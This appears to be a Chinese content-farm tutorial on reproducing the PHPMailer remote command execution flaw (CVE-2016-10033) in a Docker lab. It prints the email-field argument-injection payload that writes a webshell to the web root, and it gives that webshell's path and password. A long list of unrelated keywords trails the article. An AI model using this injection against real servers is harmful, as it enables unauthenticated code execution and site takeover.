PHPMailer中怎么复现远程命令执行漏洞
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。一、漏洞简介PHPMailer是PHP电子邮件
千家信息网最后更新 2025年12月02日PHPMailer中怎么复现远程命令执行漏洞
PHPMailer中怎么复现远程命令执行漏洞,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
一、漏洞简介
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
二、影响版本:
PHPMailer<5.2.18
三、漏洞复现
Docker环境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去镜像启动环境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name处随便输入比如"aaa",在email处输入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:
上传完一句话木马后,页面会响应3-5分钟,响应时间较长
木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld
虚拟终端:
使用脚本:
获取脚本后台回复"PHPMailer"获取脚本
看完上述内容,你们掌握PHPMailer中怎么复现远程命令执行漏洞的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注行业资讯频道,感谢各位的阅读!
漏洞
木马
脚本
输入
命令
一句话
内容
方法
更多
版本
环境
问题
安全
束手无策
为此
上下
上下文
代码
原因
后台
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
重庆有金融软件开发培训吗
数据库失效连接剔除
甘肃省教育局网络安全
自行软件开发秋收政策
谷歌地球中文版连接服务器
网络安全线上赛
应用软件如何访问数据库
网络安全工程师入侵服务器
爱奇艺的服务器
太仓运营网络技术哪个好
中天云智网络技术有限公司
虚谷数据库效率
机架式服务器有多重
2020 网络安全事件
网络安全教育橱窗
软件开发写工作日志
北京软件开发公司主要经营什么
开展网络安全和禁毒的活动感
人工智能数据库金矿
平度直播软件开发公司
甘肃省教育局网络安全
数据库的企业管理器在哪找
pc幸运28预测软件开发
宜兴自动软件开发怎么样
苹果6启动语音与数据库
软件开发项目策划
国家网络安全知识竞赛加学分吗
怎么投资手机软件开发
乌当区网络安全
泉州棋牌软件开发
